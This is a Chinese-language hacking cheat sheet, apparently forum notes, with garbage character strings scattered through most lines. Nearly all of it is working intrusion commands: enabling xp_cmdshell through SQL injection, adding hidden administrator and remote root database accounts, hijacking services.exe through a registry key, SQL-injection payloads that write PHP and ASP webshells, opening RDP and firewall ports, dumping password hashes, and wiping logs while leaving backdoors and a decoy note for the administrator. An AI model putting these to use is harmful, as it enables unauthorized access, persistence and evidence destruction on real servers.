: }$ k4 C3 p3 s2 c& }6 R! ` W
1.net user administrator /passwordreq:no ?6 h y2 Y) D
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
3 V, I( i) C5 g) I0 x! [2.比较巧妙的建克隆号的步骤3 _, T4 e. U+ M& o. T
先建一个user的用户
1 Y, _4 B; C3 M) Y: K* E! ]然后导出注册表。然后在计算机管理里删掉0 K; i3 X% P( g# m( N9 n6 Q
在导入,在添加为管理员组" y X9 l& [& s$ d, [/ s
3.查radmin密码4 d' L4 r* Y0 E3 T4 ?( v0 s3 S
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg) `1 D( N9 \) s: g
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
& g3 X: F8 J( H+ H- `3 ]2 m& e) _; K建立一个"services.exe"的项
5 w$ ~2 y# I- V8 p7 R5 j: k再在其下面建立(字符串值)
/ l* W+ P L' n4 R& h' n) ~键值为mu ma的全路径1 z* E4 i0 B1 V* B
5.runas /user:guest cmd6 h, O7 W, Z2 `; d2 X" x
测试用户权限!/ N- `0 y+ t/ y
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?; Q$ P' |# I; ^% D2 ?" n o) q
7.入侵后漏洞修补、痕迹清理,后门置放:
2 z+ ^4 b0 }+ X j, v7 R$ M基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门. {* Z) c" x1 e+ D, w4 r6 g
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
. a5 w8 G2 v$ F
6 u" a: C* u& }for example
% p, h# D ^$ |% ]& z9 r( G, n* e0 V, l/ r5 z4 X+ t; }
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
! ?/ I! j1 A. u" d9 ~+ Y, y& R! ~8 g8 f w& y- G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
. i- u/ \& g1 }: {( U/ s3 |0 O7 C4 `4 l- L$ g8 W
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了7 f# y0 l0 H2 z, Y
如果要启用的话就必须把他加到高级用户模式
! L) a9 Q1 H9 x7 b$ k% e* Y! D1 P可以直接在注入点那里直接注入
1 Y6 I: z2 j$ ?- [1 vid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
" _/ o- M4 j% Q/ c然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
* n7 p! I. h: q. ]9 f" u4 e或者( O% E7 o, O3 A! x! k6 ?- K" p% S
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
$ D k& y0 G/ ?来恢复cmdshell。
8 F; |8 u8 W# n2 {( w( {+ z% y0 |' n. o: p2 e; D
分析器; r. D! ~2 _* O1 ]0 A
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--! k9 V7 V1 H9 j( ~1 V4 t, w3 L7 t
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
4 R$ E! g8 d4 {: C% T* ^ M10.xp_cmdshell新的恢复办法2 N( v2 X3 P P# ^
xp_cmdshell新的恢复办法9 U/ X/ T# ], n' B
扩展储存过程被删除以后可以有很简单的办法恢复:( w* d5 N: i) u2 B- K2 q
删除
: t% i+ u9 A$ zdrop procedure sp_addextendedproc1 U( H$ ] {( C& y
drop procedure sp_oacreate
; ^2 I8 @, G8 r1 G- d& D! K3 l' jexec sp_dropextendedproc 'xp_cmdshell'# k$ w; G( p# B
4 a1 G' o" r% ]恢复
4 v6 J- p w- wdbcc addextendedproc ("sp_oacreate","odsole70.dll"). q: _- o s- b9 F: E R
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")1 b+ y. R( Z# k
4 W/ b- I. X; z7 z3 @
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
. R ^1 ?8 c/ t: j" ^1 [- \0 U/ I
-----------------------------) o k% K4 z( v4 }
; f4 J" `# v7 w, [- K/ H" c$ W
删除扩展存储过过程xp_cmdshell的语句:7 r. |5 M$ O/ f. U' P
exec sp_dropextendedproc 'xp_cmdshell': h" {9 T( a/ H9 k$ ^5 r& Y. X
4 H' c8 l! ~8 o4 {恢复cmdshell的sql语句
7 w O$ P, L: ]4 {' U. R( ~# Aexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'1 V- w0 k4 |8 e
/ n) `2 X6 ^2 l2 P% S
/ j% r- I/ o6 Y开启cmdshell的sql语句# T9 _9 }- V' z* g
; O( j" }# i& v, e$ C+ Q/ a
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
" z, F8 z. v0 p. J' F. W+ R
( [$ W! N0 j" u) i; b判断存储扩展是否存在+ b# s7 U! X$ v) J' ^! T$ \) q6 N d
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
% `6 I8 y; S" G返回结果为1就ok; _9 t; @* l6 f
* y) V' j3 h9 e' A9 s1 F: ?2 o) r
恢复xp_cmdshell
$ Q. |; O2 F+ H$ ~! L @exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell') j9 Z5 D* d0 ` { W% \
返回结果为1就ok( d' o8 u. e1 @8 I1 k5 y0 p
# H% e5 \3 s! }& }# l: ]
否则上传xplog7.0.dll' g! _6 j$ ?9 i" h/ u
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'/ H e2 }6 ~; u) T; }
2 _ u& p- I, Q" Z6 {4 L7 B
堵上cmdshell的sql语句
. X3 S7 d5 {- Zsp_dropextendedproc "xp_cmdshel( K( g8 d8 X/ r- c$ R( Y: ?9 e9 H$ M
-------------------------' {, T( K; o/ r" ?+ a
清除3389的登录记录用一条系统自带的命令:1 u- D- R/ C# L7 l% V
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f( x" X' @5 z- r$ ~* }3 s0 Y0 M2 u
( }. p# k4 |( _" g0 b8 S
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件0 a ]$ d: H3 q8 S: R2 o) y! p7 E4 C
在 mysql里查看当前用户的权限
c% H' X3 b% x9 g1 }3 tshow grants for
7 G" x' E- _9 X7 _. {3 K, J" l5 H- O$ e: T# A
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。: _; P2 ]7 Q3 ]/ h
; [2 G* G8 \, F& k- ~
+ [9 W) i4 M% B2 z& D
Create USER 'itpro'@'%' IDENTIFIED BY '123';" `6 J9 K0 T! Z& B6 F
2 V7 e. O0 k M& w$ `* f
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
1 Q) s m1 x3 [6 y6 D0 w$ D/ c0 A7 n) _3 Y
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0# t! X% b g! Z. y- d, @
: I, D' C% \' o) l
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;6 E* s1 V' |% _9 @
. R+ U! M, [ ^! \! l
搞完事记得删除脚印哟。. x8 [, H" D9 i# [$ M+ n
9 E) N" D* A# P( y% v+ MDrop USER 'itpro'@'%';
- _! U* Z6 H" P+ C; H$ @5 d d* M8 [- A
Drop DATABASE IF EXISTS `itpro` ;
8 e7 f0 d9 l% ^1 o8 t/ @ \
0 Z% K( v2 C$ a/ X- m0 r1 T* K当前用户获取system权限
" C" K& q+ H6 p: p) @5 A. w$ fsc Create SuperCMD binPath= "cmd /K start" type= own type= interact* P3 l: b4 |5 K
sc start SuperCMD
& t/ t: u' \1 C5 ]' g程序代码
' R; b, I" ?5 P" a5 \<SCRIPT LANGUAGE="VBScript">2 K/ i2 K/ i( }: w* L" l7 W" G/ E
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
# r3 S4 ]( v0 |! H8 mos="WinNT://"&wsnetwork.ComputerName
& O9 D, @( Z. l8 l7 c+ ?Set ob=GetObject(os)
' S1 T( d1 ~3 Z& U# M) I& tSet oe=GetObject(os&"/Administrators,group")
' W* D7 ?' x& I# aSet od=ob.Create("user","nosec")9 m& Q3 G2 v, X( }3 M' h
od.SetPassword "123456abc!@#"
- j( v7 E9 S, wod.SetInfo0 ^4 }) O; y) I- c( i
Set of=GetObject(os&"/nosec",user)# |, [6 b' C0 g* _
oe.add os&"/nosec": x- b* X# J9 i8 z# g
</Script>
3 R) e& g2 r- W/ I& L; I+ f<script language=javascript>window.close();</script>) K0 P1 L/ c+ L/ ]
6 i/ G8 W. L# y+ g
4 ~$ c. U$ M# S+ Y( q2 w7 e$ o
7 Q8 b$ H. _, E2 d9 g1 X( g4 x' E8 s# C3 I9 J
突破验证码限制入后台拿shell
3 |! k6 p9 h- Z2 H程序代码
5 P* T, [. z! E. h6 @! XREGEDIT4 7 _5 E0 _& ^5 n1 U( w
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ( t$ _' d1 |% `( b5 t& I' c
"BlockXBM"=dword:000000004 @- r7 f ]! v
) O c- ^$ M+ k2 l) q保存为code.reg,导入注册表,重器IE- L& E+ J2 P* m6 P
就可以了0 G1 B5 M8 T# Q7 `2 M
union写马
" w3 W& y7 j; _. W% }程序代码1 R( K' D$ u6 B
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
- d* t- d' y$ `% {8 ^4 @9 V4 y$ s9 T& m- T( V* s: h0 s
应用在dedecms注射漏洞上,无后台写马 ~' |5 C5 |) h
dedecms后台,无文件管理器,没有outfile权限的时候5 z/ D: @. I5 a1 w7 W/ P
在插件管理-病毒扫描里. a; j& ]9 o2 J7 ] z3 y! I4 ~: x
写一句话进include/config_hand.php里
' s( |$ m4 R6 c6 i5 q: K- o& h7 J程序代码
! ^$ a& f( ?; [% j( w>';?><?php @eval($_POST[cmd]);?>( \6 U. ~" Z/ V+ X9 ?- }+ F
/ s0 s# w/ Y1 C* M' ?+ N% m2 A7 l% K! E
. j5 L4 t( Q. ~4 R如上格式
% K' k) q% |- W! F+ q2 i" C' C( n/ R9 c! O+ M
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解5 [9 Y- }7 h9 A. I1 Z/ B# z1 W
程序代码
& v4 t* X" d. h0 c! nselect username,password from dba_users;
" b- ~+ P7 h+ A) Z+ F& f7 G; s9 Y4 g. j
/ Q7 G3 J H; V+ vmysql远程连接用户
/ Z& `5 e: N* s+ N程序代码
8 F- e" `2 k- H
4 |! ?$ v7 w" k5 V0 x/ DCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';5 S, H l& K# z2 f
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION1 S5 V0 C6 q, i+ P
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0; Y) X7 Y) j5 P/ I- N2 x
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
4 f( }" \9 V' W" e9 ]
3 _/ D% g; @4 c% q
5 D! |, t( L+ x! }6 g' e
' U% p. |! }! ]3 K: T* l. b: S5 y3 p4 w9 h0 @7 A
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
: d; S6 e" h( @9 p" {8 j3 ]! ^) ~0 U' _. z' e8 A4 Z9 y& o
1.查询终端端口
4 M1 i0 w& z* @+ ]* G: j0 A! d* I% T; V. f) A
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
: y, N+ L7 z8 z5 s) J& m% f. c, w# _7 E! U
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
; k2 U' Q y% t$ W- \2 Htype tsp.reg9 I) C0 y2 N2 s' I
8 D; S( j7 \, j- }% O# [- ]2.开启XP&2003终端服务
* `+ d: ]+ z Q1 v. n# B1 K$ r4 w- d- O) k* v- W$ z
& _5 A8 g6 f/ @0 m3 y, J+ o) B! v: E
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f. V) S4 v& m2 ^; e# E
$ U8 r5 h: \9 K; O: k
4 Q( ]& n0 X+ S& I$ y- pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
1 T8 m3 N% a t& z: U/ _0 s9 [" x( O9 Z
3.更改终端端口为20008(0x4E28)
, k; D( M) w( m& z; K- H% }, w C4 ?- o% c7 T. N/ ~
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
# v, Z% s+ }0 q: @: C/ V% N1 N, T0 [9 \$ H( V- z3 O3 P# q# \
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
2 W2 v- t- e) T
- y0 w% _" C! B$ i0 b4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
% G# |$ O/ p' o: c
3 R/ d, T: L3 j2 K) x& G8 \REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
/ t$ |) l$ ~- p! U3 z/ E
: S1 R, ^1 ^/ n2 L# v! @' W- a6 G9 u2 T |- b. W0 \; T& b+ K
5.开启Win2000的终端,端口为3389(需重启)& H4 b# `! K' {' K" L
' i5 J. C. @" D y) d' q! Y
echo Windows Registry Editor Version 5.00 >2000.reg 0 H7 `# f, K; o) E
echo. >>2000.reg6 S* c i6 c. j' P3 x4 a. p2 X& R! c! I
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg ! f& _, ^% l& V4 G$ A/ [5 ?) v4 j
echo "Enabled"="0" >>2000.reg
0 V' t: S$ }9 Decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
; r; b3 D$ L1 m7 l0 E2 N' necho "ShutdownWithoutLogon"="0" >>2000.reg 7 o5 T4 r6 @6 Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
% z; E# k3 {( _% _echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
/ l5 M& p, X | w; g7 ^# B% {. eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 4 V0 l; c4 ~* B' {/ d
echo "TSEnabled"=dword:00000001 >>2000.reg 6 T) O9 k5 ]0 T. k( C" P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg ' W7 H1 t* \, N" h( D) q
echo "Start"=dword:00000002 >>2000.reg
e1 Y6 u' o, D4 [* U% Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 4 s4 D# x3 o0 Q9 U5 [0 }
echo "Start"=dword:00000002 >>2000.reg
! L- J6 i Z% a# m3 ~+ Necho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
0 Z3 p: V+ B! x1 Cecho "Hotkey"="1" >>2000.reg
7 y6 \/ c& }0 Uecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg $ r4 L" m+ ~4 ^6 U( T+ H, P$ M
echo "ortNumber"=dword:00000D3D >>2000.reg 2 |7 M- a( q: {( v8 o" }4 `, R
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg 9 n0 C6 v+ J7 s w
echo "ortNumber"=dword:00000D3D >>2000.reg! Y/ v. q% g# C2 I
' `7 Z. d0 [7 B# `3 Q2 y' l6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)6 ?" H3 f- c& W8 Q, \: z
! L/ C. ?; o ?( G; _
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
T6 z/ O. u+ A! |# g(set inf=InstallHinfSection DefaultInstall)
8 k* L/ o! c" ~' p4 mecho signature=$chicago$ >> restart.inf
- ?+ @- g& P+ k6 Kecho [defaultinstall] >> restart.inf" `+ |* M! k* K$ L+ ]5 X9 p* c f2 q2 Y
rundll32 setupapi,%inf% 1 %temp%\restart.inf
& u) g( O6 W% _: n3 z5 u; r4 h4 M6 F" E5 e9 }0 m6 e
/ z ]# @; F0 I, V7.禁用TCP/IP端口筛选 (需重启)
/ y. A! G E4 n+ J$ M# V
; }/ [; O3 T5 b. R# iREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
/ G+ g. H* }0 t+ v, N% K& W, v# m: p" ^. B. m
8.终端超出最大连接数时可用下面的命令来连接' g) `; E& Z0 H# L) j# B
8 l, I$ z( ]1 Nmstsc /v:ip:3389 /console! ^3 S; V. J1 B
3 r& [& I" {1 Y% b, k5 k
9.调整NTFS分区权限
0 u5 ]5 ^9 w$ T0 k
& ~; @ B( D- J: icacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)8 D, M: V: F; {
' }; J& `- o/ w. d
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)7 T% [% |- |! ~/ \
. }: _) E6 x6 R) c
------------------------------------------------------
. {: |+ z1 q E+ y1 Y3389.vbs
5 b; s( {1 i0 z3 J7 ^ X u; VOn Error Resume Next
, r- ?( a/ T* \# b8 H _" rconst HKEY_LOCAL_MACHINE = &H80000002
5 R: P% E( H1 m+ e% ^4 ^strComputer = "."6 v! T) ~7 q5 y. y
Set StdOut = WScript.StdOut* y9 ]! T& @+ V! U" O( [' O
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_3 }8 T( A% v+ ~) l
strComputer & "\root\default:StdRegProv")( c/ k* ^5 V( t+ y. ^
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"" \- p3 j8 ~ z
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath9 i' i" z& ?* I
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
0 _+ {4 k% p. j/ P4 Uoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
c1 y/ {' {5 C0 s. K# w/ W. e# ]strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
: i+ n8 q6 X, o4 Z+ D- JstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server") G6 U3 m$ p/ l, z2 e( k$ W1 H
strValueName = "fDenyTSConnections"
- H$ L& Q' n1 N' `. X7 {' s; edwValue = 0
3 z+ K/ b7 K1 k- @3 xoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
; u/ U5 d! n! u6 cstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
% u7 C% \ S, _% V1 g1 v" gstrValueName = "ortNumber"
0 G! }4 c# g! h$ \dwValue = 3389
: e) ^1 F! _9 e7 Eoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue3 j1 x5 X; e! E" S. I
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp") A+ R7 e2 }9 @( T
strValueName = "ortNumber") t, e1 M T( h9 |* p- a" Y
dwValue = 3389
! Y2 Y% O5 e: ]1 moreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. o8 O% H1 L* R% M F! Y4 ZSet R = CreateObject("WScript.Shell") 2 k( }: y+ s) m% ~( E8 @
R.run("Shutdown.exe -f -r -t 0")
) @" q* h3 G1 W/ u: I9 y: _: ?7 u. ]3 [3 |! Q# e/ A
删除awgina.dll的注册表键值
' s: @3 v7 V. w* D程序代码. Q/ |6 W! Z* ~. ~: L0 o/ E
; ]& C' R' z- q& ]reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
- w3 n R' N0 J5 Y' e: q' ^* c2 m; d/ l9 p9 ]! Q; F
6 Y( W# D# f6 \8 U" L0 f
# D% X T, t5 r, H3 b
8 J2 ] v6 E' ?4 G$ c程序代码
6 d4 M% z$ B3 T. L1 YHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
& Z% _/ u# r, W. J( [" V
4 @( o& V. v( j0 C设置为1,关闭LM Hash
. [2 d6 P! e5 Q) C. }& O9 R6 d2 O
0 y _" K; e \. t, r8 k数据库安全:入侵Oracle数据库常用操作命令
0 i7 w9 Z+ S1 B最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。2 @3 c4 x0 k2 C
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
2 n4 |) R, t; D# _8 Z; `5 M2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
( Z4 g/ m2 A5 W8 v) i5 t3、SQL>connect / as sysdba ;(as sysoper)或
9 A9 v: u! @2 {connect internal/oracle AS SYSDBA ;(scott/tiger)
- z$ Q8 u/ [# rconn sys/change_on_install as sysdba;
3 w, ?# T& F j5 L# v* p7 d4、SQL>startup; 启动数据库实例8 u3 ^$ e8 Q, ~% ]& @! I2 d
5、查看当前的所有数据库: select * from v$database;
7 O' R) ~+ q2 d% | sselect name from v$database;: P& _1 T" d8 L8 L- C1 H( |! _4 G& k
6、desc v$databases; 查看数据库结构字段2 T V3 W6 _) J! D
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
. T$ V e/ V" j7 t4 jSQL>select * from V_$PWFILE_USERS;
/ w. E/ c. a2 _% tShow user;查看当前数据库连接用户2 \, s* L' X0 V' ~! C
8、进入test数据库:database test;
7 m+ w; N( L' e5 b. I9、查看所有的数据库实例:select * from v$instance;* u* S" @+ h8 w4 Y8 M* B. t% N
如:ora9i7 m+ X ?/ K" X6 B6 N- F, @
10、查看当前库的所有数据表:
( w4 @/ f3 }6 J/ i$ V* oSQL> select TABLE_NAME from all_tables;
' k. Y! z; p" k) Fselect * from all_tables;
4 \+ m1 ?% i" z# JSQL> select table_name from all_tables where table_name like '%u%';2 B% q" l# L7 s: b
TABLE_NAME9 t, y/ S) U+ N+ ]0 E7 n
------------------------------" i! Q+ n/ w, L2 I
_default_auditing_options_
s7 Y0 p, _8 {( i11、查看表结构:desc all_tables;
7 S' |1 x% E% K$ S) w" U12、显示CQI.T_BBS_XUSER的所有字段结构:
1 L( j' j) l+ cdesc CQI.T_BBS_XUSER;4 C& ~: W2 V. F4 s! p5 p
13、获得CQI.T_BBS_XUSER表中的记录: A% H0 W: D& k0 D/ g! l
select * from CQI.T_BBS_XUSER;
. ~0 D$ o( _5 R14、增加数据库用户:(test11/test)' m9 f" }9 c+ y0 U7 R
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
+ @$ s6 l |( v1 v4 O" ~9 S: H15、用户授权:
/ W6 I$ V9 _$ p- z6 B6 r+ Y( bgrant connect,resource,dba to test11;
) h6 t0 f/ l: ^$ q, j- Q2 @grant sysdba to test11;
6 u# e/ B1 n+ J5 I5 fcommit;# o1 E; C' G* H$ r3 R3 Q4 D0 `
16、更改数据库用户的密码:(将sys与system的密码改为test.)9 K- u- u Y, |: p/ n
alter user sys indentified by test;
4 m7 I& @# G+ B9 Balter user system indentified by test;
! S/ F2 m# L1 [ S+ w! r9 `- X
, T" a+ {/ L s4 KapplicationContext-util.xml
! k1 Y4 e) L4 K% ?7 U# ^applicationContext.xml* [0 E. V7 T8 A; I; X
struts-config.xml W% k' E1 b& I" J4 I
web.xml
1 ^. k. Q1 ?5 N2 lserver.xml5 m+ ?, x3 I3 d
tomcat-users.xml
S1 S/ i9 J4 |* E% j7 M7 nhibernate.cfg.xml
4 D1 n" N4 J) [, R) t: k( M( b4 M! sdatabase_pool_config.xml
W4 L& ]& {" z- c
: o' x" c9 n7 y3 d/ F' L
3 G5 D7 y" ~+ M\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置/ c+ ]! U2 | v. |" q7 Z2 w
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini2 Y; r# t' j* H/ X
\WEB-INF\struts-config.xml 文件目录结构+ c6 F9 }* p6 O( Y
5 l9 b" t6 O8 q$ d& z1 B
spring.properties 里边包含hibernate.cfg.xml的名称
( q* J9 P) W0 O+ W! A- a# y) ~
6 Z4 p" a8 G3 p8 LC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml6 e1 T0 L$ X5 O/ \2 P2 D
& _; W7 R0 C5 T$ O0 V
如果都找不到 那就看看class文件吧。。
& }& N8 q. d: ]: [% ^- [, Y# L1 e* r7 ?! _, i
测试1:! w- X) D, {4 n: V& X
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t11 [8 P- [ X/ p0 }
* N7 C, F$ L: W/ \
测试2:) v, H3 S+ J. V6 Z# _
( j9 Z5 R8 y" C2 ~) d
create table dirs(paths varchar(100),paths1 varchar(100), id int)
x4 ^5 b2 o4 H2 Z
% L5 s* t! g6 t/ e8 Gdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
! e' B+ e3 k8 |% J5 D9 M. e8 u
; K) J' F, ^1 z+ _0 y) d9 |" m7 `. RSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t11 x, Z% {- {: f5 f5 P
0 d* Z" M& s: T: i$ V; P查看虚拟机中的共享文件:
# Q2 M( v9 U h! L; e/ f3 s在虚拟机中的cmd中执行
4 r: q, b* k7 I1 T [9 ]: p\\.host\Shared Folders
" E t4 y/ J4 i% N( {7 L8 m i$ C
( Z6 _( f* b, |4 Scmdshell下找终端的技巧- t6 I& |8 i2 Y, X m" r9 Q* c$ ~& {
找终端:
* D( Z6 I; R' [7 _, ~3 z% W$ z第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! ' L q2 y' M- i" ~# ~" I
而终端所对应的服务名为:TermService
6 Z, Y$ Z0 R. P7 ]9 s) B) r/ g第二步:用netstat -ano命令,列出所有端口对应的PID值! 9 r) y1 M* _% Y' `7 {1 b
找到PID值所对应的端口
0 Y& x3 x& l/ _- @& o H
G$ N2 s3 y+ J% C5 D/ ^查询sql server 2005中的密码hash* q! o1 r2 \; f/ ]- g: Q7 C
SELECT password_hash FROM sys.sql_logins where name='sa'
+ T0 \ L* L& ?7 DSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a1 Q2 `& g b' @0 Z6 S
access中导出shell
) U% J& |' ?& q- f$ x/ f& ~0 I9 Y. A+ r7 q9 U
中文版本操作系统中针对mysql添加用户完整代码:
5 x3 D: ~8 j' s) O `2 S
$ X; M( p! I/ l' N( C# Cuse test;! u: J. G& r+ @. D6 u
create table a (cmd text);
8 F5 j S% |; a( I" F# Oinsert into a values ("set wshshell=createobject (""wscript.shell"") " ); d' d( x* h3 e9 X. ?9 }6 Y
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );9 i! b2 Z+ E; X
